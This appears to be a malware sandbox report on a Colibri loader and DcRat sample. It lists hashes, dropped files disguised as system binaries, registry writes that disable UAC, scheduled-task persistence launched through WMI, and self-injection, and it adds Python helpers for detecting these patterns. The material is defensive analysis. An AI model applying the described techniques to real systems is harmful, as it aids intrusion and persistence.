C:\Users\Admin\AppData\Local\Temp\d0b27f55-043d-44d8-bb49-edac62daf534.vbs

MD5 d454376207c8cbcb93d98d094d7b845f
SHA1 2222da517cca3985a0bc84e65805825e37db737a
SHA256 e0738cd7faa6b7e918092d7fe891af52977c6a3412e03e2ff0a63561f6f3234d
SHA512 32280cfb1e76459407aba988d6ed213c45595c72683fc889c2b422ac1fa2950d2ace85caef57bc2688c6df0f6adf5668d46d902996253482ad3f12993181996b

C:\Users\Admin\AppData\Local\Temp\tmpF6FC.tmp.exe

MD5 e0a68b98992c1699876f818a22b5b907
SHA1 d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA256 2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512 856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

C:\Users\Admin\AppData\Local\Temp\ab0385af-7c65-4dd9-9fc7-3ce605066610.vbs

MD5 e07b73e7c99e883524220f9771e1cc14
SHA1 02a74f92d5fbdd6ad5492ff12c3f532d0432b6bf
SHA256 b220b2c8382943905945b7855840b7e212055e1a861461635fbcec4d400f845e
SHA512 8a37ea23e7d2a8f1ff9c56e8a7f634960df1c041d4d291a7d6dccf0795184c1ddd7705fb3bb9c16d5432724b981dde609ad58bd78762c62d40eb6de365108b92

C:\Users\Admin\AppData\Local\Temp\37ce2d55-a30d-469a-b78d-d3f50b81ccab.vbs

MD5 d59fdc774bf3e2b7eaabf59f2e68246e
SHA1 5a4bdbcc000bdef7416383807885ffb9a573dd53
SHA256 1fd9f3495e3264cc7dcf9a95844af7c6e6a5869559fba55dacd948077e151a29
SHA512 1364fb335eae47a65b516e60b5c9f8b44d25f819ca0510ca893a3f7fe9f435ccd820f1096a9c5d51354003e0b161322309602b283aac84234ae7e57e74574806

C:\Users\Admin\AppData\Local\Temp\e0801a69-6fb7-4a78-b405-de19841e11a0.vbs

MD5 83d5a737a9119fa9ccb9b8959ad3dbeb
SHA1 37ca3d27fb03a5c95df22586d0fe2974ecbcb622
SHA256 143aafacf79e9ce2a774a031e7803ee1eed66bad78e97a5bce6d2461d752db8a
SHA512 0167ec2cf53b05510c4bffd6b1d46b5595cb1ae4726aee018fac01e313c521a1bc3808482bdcec098363ca891b3f289bff6bf3c79fd3c04c66420de16146a146

C:\Users\Admin\AppData\Local\Temp\e88acb5f-586f-432c-9bb6-a9335c637174.vbs

MD5 6753b6e09f2df6640ef6f3a46aa4a4d8
SHA1 2478c5797462fae002e47b9d015f1c053930686c
SHA256 883e39093d8dfd5379a31510756131ea9ef27d65012aa85692e50f3d268e0d50
SHA512 fe932dc981f5d07a5979b2eb02e53ab21887e9bb7b08f0205184bb4ed0420753b21fc6507800fc66eb160b45879433e55cf5ebeb5d749426526a45d6fe74ef8b

C:\Users\Admin\AppData\Local\Temp\607d0094-c8cf-45b0-a489-eb60253042bd.vbs

MD5 bc4cb2a473cb30cd0d773e83b660f572
SHA1 0e9bfc2626390553fd29d38952257cdb74070d69
SHA256 fa1b1768cfea64ed3b25d11d415324ccd3d123227a5d6e2b4788470b723340bf
SHA512 7d648d2f9ef38be926310c2d3b34b502de0b520cb30f8e5e8ba89e678c12936f12525ea31a06636a069ff8b3f0680a96905aa5970bab4011a4503f0f7bcd751d

C:\Users\Admin\AppData\Local\Temp\eb67a883-7167-4851-8475-59ffe31fb9ca.vbs

MD5 c05e3d4254eb612e6deb933ee3127a3e
SHA1 15e402eaa729ee56d4c63e7070bb138960c74df4
SHA256 660d096e77bc40c708d1adba73a51a1131408081e9a434184285a6c61bccace8
SHA512 53090d18ad56d8fca05cde5572ef616b980fb81faf1bb5a3168a28a6099bf666a60dec6c589192f97ff7a1d43cdb44fa96574f36101bb7103153dfe2e6c399d5

C:\Users\Admin\AppData\Local\Temp\d00a8001-25b8-4121-bf98-8ef2d7936fa1.vbs

MD5 3938b8b6312fec2ad80766e03d4bfd4e
SHA1 baff044ee70a1724144f390c83b7dced2d067c30
SHA256 29308b0a1106a64c49fa116ec97619f342d1a233b45a1d1ec7e28da90c602d45
SHA512 9de18ae35d2b6c8b6a427f75ee395856aae01f18f0ae80c908104d70cc252271695a5cfc59e52eaab1d1a1f22f86dbb557dccd2051bff486e935232541963532

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 15:19

Reported

2024-11-08 15:21

Platform

win10v2004-20241007-en

Max time kernel

120s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe"

Signatures

Colibri Loader

loader colibri

Colibri family

colibri

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Program Files\VideoLAN\6ccacd8608530f C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\66fc9ff0ee96c2 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Windows\PLA\9e8d7a4ca61bd9 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Program Files\Windows Multimedia Platform\9e8d7a4ca61bd9 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Windows\Temp\MsEdgeCrashpad\reports\e1ef82546f0b02 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Media Player\es-ES\e15c75ee0b3582 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Program Files\dotnet\shared\e6c9b481da804f C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Dcrat family

dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe (30 identical rows)

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A (2 identical rows)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A (2 identical rows)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A (2 identical rows)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A (11 identical rows)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A (11 identical rows)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A (11 identical rows)

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (22 identical rows)

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Default\Pictures\SppExtComObj.exe N/A (10 identical rows)
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A (2 identical rows)

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default\Pictures\SppExtComObj.exe N/A (11 identical rows)
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A (2 identical rows)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A (11 identical rows)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A (2 identical rows)
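The "UAC bypass" table and the "Checks whether UAC is enabled" table together show the dropper and its copy in C:\Users\Default\Pictures reading EnableLUA and then writing "0" to EnableLUA, ConsentPromptBehaviorAdmin and PromptOnSecureDesktop. Writing under that Policies\System key requires an administrative token, so what the sandbox labels a bypass is UAC being switched off for later elevations: ConsentPromptBehaviorAdmin=0 silences the consent prompt immediately, while EnableLUA=0 only takes full effect after a reboot. The following Python is an added triage helper, not code from this report or from the sandbox. It parses registry rows in the row format used on this page (sample rows constructed inline; a row may carry an optional "(N identical rows)" suffix where duplicates have been collapsed) and reports which process weakened which setting.

```python
import re
from collections import Counter, defaultdict

# HKLM key whose values govern UAC, and what writing "0" to each value does.
UAC_POLICY_KEY = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
UAC_VALUES = {
    "EnableLUA": "UAC switched off for every user (takes effect after a reboot)",
    "ConsentPromptBehaviorAdmin": "administrators elevate silently, no consent prompt",
    "PromptOnSecureDesktop": "elevation prompts no longer use the secure desktop",
}

# One registry row from the report: <Description> <Indicator> <Process> N/A,
# optionally followed by "(N identical rows)" where duplicates were collapsed.
ROW_RE = re.compile(
    r'^(?P<desc>Set value \(int\)|Key value queried)\s+'
    r'(?P<path>\\REGISTRY\\.+?)'
    r'(?:\s+=\s+"(?P<value>[^"]*)")?\s+'
    r'(?P<process>\S+)\s+N/A(?:\s+\((?P<n>\d+) identical rows\))?$'
)

def parse_row(line):
    """Return the row's fields as a dict, or None for rows that are not registry reads/writes."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    row = m.groupdict()
    row["key"], _, row["name"] = row["path"].rpartition("\\")
    row["n"] = int(row["n"] or 1)
    return row

def assess_uac_events(lines):
    """Per process: how often each UAC value was read, and what it was last set to.

    Returns (per_process, findings). A finding is produced for every process
    that wrote "0" to one of the three values; EnableLUA=0 is the most severe
    because it disables UAC outright rather than just quieting it.
    """
    per_process = defaultdict(lambda: {"queried": Counter(), "set": {}, "writes": Counter()})
    for line in lines:
        row = parse_row(line)
        if row is None or row["key"] != UAC_POLICY_KEY or row["name"] not in UAC_VALUES:
            continue
        rec = per_process[row["process"]]
        if row["desc"] == "Key value queried":
            rec["queried"][row["name"]] += row["n"]
        else:
            rec["set"][row["name"]] = row["value"]
            rec["writes"][row["name"]] += row["n"]
    findings = []
    for process, rec in sorted(per_process.items()):
        for name, value in sorted(rec["set"].items()):
            if value == "0":
                findings.append(f"{process}: {name}=0 ({UAC_VALUES[name]})")
    return dict(per_process), findings

def effective_policy(lines):
    """Final value of each UAC setting after all writes in the log (last write wins)."""
    state = {}
    for line in lines:
        row = parse_row(line)
        if row and row["desc"].startswith("Set value") and row["key"] == UAC_POLICY_KEY:
            state[row["name"]] = row["value"]
    return state

def uac_disabled(lines):
    return effective_policy(lines).get("EnableLUA") == "0"

# Sample rows constructed from the row formats used in this report.
ORIG = r"C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe"
COPY = r"C:\Users\Default\Pictures\SppExtComObj.exe"
SAMPLE_ROWS = [
    rf"Key value queried {UAC_POLICY_KEY}\EnableLUA {COPY} N/A",
    rf'Set value (int) {UAC_POLICY_KEY}\PromptOnSecureDesktop = "0" {ORIG} N/A',
    rf'Set value (int) {UAC_POLICY_KEY}\ConsentPromptBehaviorAdmin = "0" {COPY} N/A',
    rf'Set value (int) {UAC_POLICY_KEY}\EnableLUA = "0" {COPY} N/A (11 identical rows)',
    rf"Key value queried {UAC_POLICY_KEY}\EnableLUA {ORIG} N/A",
    rf'Set value (int) {UAC_POLICY_KEY}\EnableLUA = "0" {ORIG} N/A',
    # a discovery row from the same report; the parser must leave it alone
    r"Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A",
]

if __name__ == "__main__":
    per_process, findings = assess_uac_events(SAMPLE_ROWS)
    for f in findings:
        print(f)
    print("effective policy:", effective_policy(SAMPLE_ROWS), "UAC disabled:", uac_disabled(SAMPLE_ROWS))
```

The parser can be pointed at the full report text, one row per line. On a live host the equivalent check is reading the three values under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System: EnableLUA should be 1 and ConsentPromptBehaviorAdmin should not be 0.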

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4600 set thread context of 3076 N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 5004 set thread context of 1980 N/A C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe
PID 5596 set thread context of 5668 N/A C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe
PID 6128 set thread context of 1812 N/A C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe
PID 5168 set thread context of 2104 N/A C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe
PID 3108 set thread context of 2012 N/A C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe
PID 4264 set thread context of 5504 N/A C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe
PID 5804 set thread context of 5944 N/A C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe
PID 3668 set thread context of 5064 N/A C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe
PID 2232 set thread context of 4444 N/A C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe
PID 3616 set thread context of 2892 N/A C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe
PID 5400 set thread context of 5404 N/A C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe
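The parent/child rows earlier in this section (WmiPrvSE.exe repeatedly spawning schtasks.exe) and the SetThreadContext table above describe two process-level patterns worth detecting on their own. A process started via WMI (for example Win32_Process.Create) gets the WMI provider host, WmiPrvSE.exe, as its parent, so the task registrations appear to come from a system service rather than from the sample. Every SetThreadContext row here has the same image as source and target, the sequence a RunPE-style loader uses: start a suspended copy of itself, overwrite it, rewrite the main thread's context, resume. The Python below is an added example, not code from this report or the sandbox; it parses both row formats (sample rows constructed from this page, plus one constructed negative control) and returns both findings.

```python
import ntpath
import re
from collections import Counter

# Row formats of the "Process spawned unexpected child process" and
# "Suspicious use of SetThreadContext" tables in this report.
PARENT_RE = re.compile(
    r"^Parent (?P<parent>\S+) is not expected to spawn this process N/A (?P<child>\S+)"
    r"(?: \((?P<n>\d+) identical rows\))?$"
)
CONTEXT_RE = re.compile(
    r"^PID (?P<src>\d+) set thread context of (?P<dst>\d+) N/A (?P<src_image>\S+) (?P<dst_image>\S+)$"
)
# tmp<hex>.tmp.exe: the GetTempFileName-style names of the transient loader stages seen here.
TEMP_EXE_RE = re.compile(r"^tmp[0-9a-f]{1,4}\.tmp\.exe$", re.IGNORECASE)

def is_temp_exe(path):
    return TEMP_EXE_RE.match(ntpath.basename(path)) is not None

def wmi_launched_children(lines):
    """Children whose parent is WmiPrvSE.exe, i.e. processes started through WMI."""
    out = Counter()
    for line in lines:
        m = PARENT_RE.match(line.strip())
        if m and m["parent"].lower().endswith(r"\wbem\wmiprvse.exe"):
            out[m["child"].lower()] += int(m["n"] or 1)
    return out

def self_injections(lines):
    """SetThreadContext calls where source and target run the same image (self-hollowing)."""
    hits = []
    for line in lines:
        m = CONTEXT_RE.match(line.strip())
        if m and m["src_image"].lower() == m["dst_image"].lower():
            hits.append((int(m["src"]), int(m["dst"]), m["src_image"]))
    return hits

def summarize(lines):
    findings = []
    for child, n in sorted(wmi_launched_children(lines).items()):
        findings.append(f"{child} started via WMI (WmiPrvSE.exe as parent) x{n}")
    for src, dst, image in self_injections(lines):
        stage = "temp-file loader stage" if is_temp_exe(image) else "unexpected image"
        findings.append(f"PID {src} rewrote thread context of PID {dst} ({stage}: {image})")
    return findings

# Sample rows constructed from this report, plus one negative control.
SAMPLE_ROWS = [
    r"Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe (30 identical rows)",
    r"PID 4600 set thread context of 3076 N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe",
    r"PID 5004 set thread context of 1980 N/A C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe",
    # constructed negative control: a different target image is not self-injection
    r"PID 1111 set thread context of 2222 N/A C:\Users\Admin\AppData\Local\Temp\tmp0000.tmp.exe C:\Windows\System32\svchost.exe",
]

if __name__ == "__main__":
    for f in summarize(SAMPLE_ROWS):
        print(f)
```

The WMI indirection is why a detection keyed only on "sample spawns schtasks.exe" misses this persistence; keying on WmiPrvSE.exe spawning schtasks.exe, powershell.exe or cmd.exe catches it regardless of which process issued the WMI call.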

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Portable Devices\sihost.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\VideoLAN\Idle.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\RCX8B1B.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Media Player\es-ES\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Media Player\es-ES\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\66fc9ff0ee96c2 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\dotnet\shared\OfficeClickToRun.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\dotnet\shared\e6c9b481da804f C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Multimedia Platform\9e8d7a4ca61bd9 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\sihost.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
